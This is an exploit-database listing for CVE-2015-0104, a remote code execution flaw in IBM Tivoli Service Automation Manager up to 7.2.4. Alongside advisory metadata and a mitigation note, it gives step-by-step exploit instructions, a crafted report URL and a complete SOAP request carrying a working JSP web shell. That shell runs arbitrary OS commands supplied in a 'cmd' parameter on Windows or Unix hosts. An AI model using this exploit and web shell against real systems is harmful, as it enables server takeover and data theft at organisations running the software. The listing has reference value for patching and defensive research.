IBM Tivoli Service Automation Manager Remote Code Execution

vendor:

Tivoli Service Automation Manager

by:

Jakub Palaczynski

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Tivoli Service Automation Manager

Affected Version From: All versions of IBM Tivoli Service Automation Manager up to 7.2.4

Affected Version To: 7.2.4

Patch Exists: YES

Related CWE: VU#782708, CVE-2015-0104

CPE: ibm:tivoli_service_automation_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

IBM Tivoli Service Automation Manager Remote Code Execution

An attacker can exploit this vulnerability by creating a malicious report and injecting a JSP payload into the SOAP request. The payload will be executed on the server side.

Mitigation:

IBM Tivoli Service Automation Manager 7.2.5 and later versions contain a fix for this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: IBM Tivoli Service Automation Manager Remote Code Execution
# Date: 12\12\2014
# Exploit Author: Jakub Palaczynski
# Vendor Homepage: http://www.ibm.com/
# Version: All versions of IBM Tivoli Service Automation Manager up to 7.2.4
# VU/CVE: VU#782708, CVE-2015-0104

1. Create report
2. Browse to: https://site/maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&reportNum=
3. Catch SOAP request generated by submitting form from previous step and inject JSP payload. Sample SOAP request:

POST /maximo/report?__document=/system/path/web/root/shell.jsp&__report=<valid_report_name>&appname=<valid_appname>&__requestid=&__sessionId=<valid_sessionid> HTTP/1.1

Host: site
Content-Length: xxx

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetUpdatedObjects xmlns="http://schemas.eclipse.org/birt"><Operation><Target><Id>Document</Id><Type>Document</Type></Target><Operator>GetPage</Operator><Oprand><Name>where</Name><Value>aaaaaaaaaaaaaaaaaaaaaa<![CDATA[<%@ page import="java.util.*,java.io.*"%> 

<% 

      try {

      String cmd; 

String[] cmdarr; 

String OS = System.getProperty("os.name"); 

    if (request.getParameter("cmd") != null) { 

        cmd = new String (request.getParameter("cmd")); 

      if (OS.startsWith("Windows")) { 

       cmdarr = new String [] {"cmd", "/C", cmd}; 

      } 

      else { 

       cmdarr = new String [] {"/bin/sh", "-c", cmd}; 

      } 

      Process p = Runtime.getRuntime().exec(cmdarr); 

      OutputStream os = p.getOutputStream(); 

      InputStream in = p.getInputStream(); 

      DataInputStream dis = new DataInputStream(in); 

      String disr = dis.readLine(); 

      while ( disr != null ) { 

        out.println(disr); 

        disr = dis.readLine(); 

      } 

    } 

      } catch (Exception e) { e.printStackTrace();}      

%>]]>aaaaaaaaaaaaaaaaaaaaaa</Value></Oprand><Oprand><Name>__isdisplay__where</Name><Value></Value></Oprand><Oprand><Name>appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>__isdisplay__appname</Name><Value>APPNAME</Value></Oprand><Oprand><Name>usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__isdisplay__usepagebreaks</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__svg</Name><Value>true</Value></Oprand><Oprand><Name>__page</Name><Value>1</Value></Oprand><Oprand><Name>__taskid</Name><Value></Value></Oprand></Operation></GetUpdatedObjects></soap:Body></soap:Envelope>

4. Web shell is now ready to use in path specified in __document parameter's value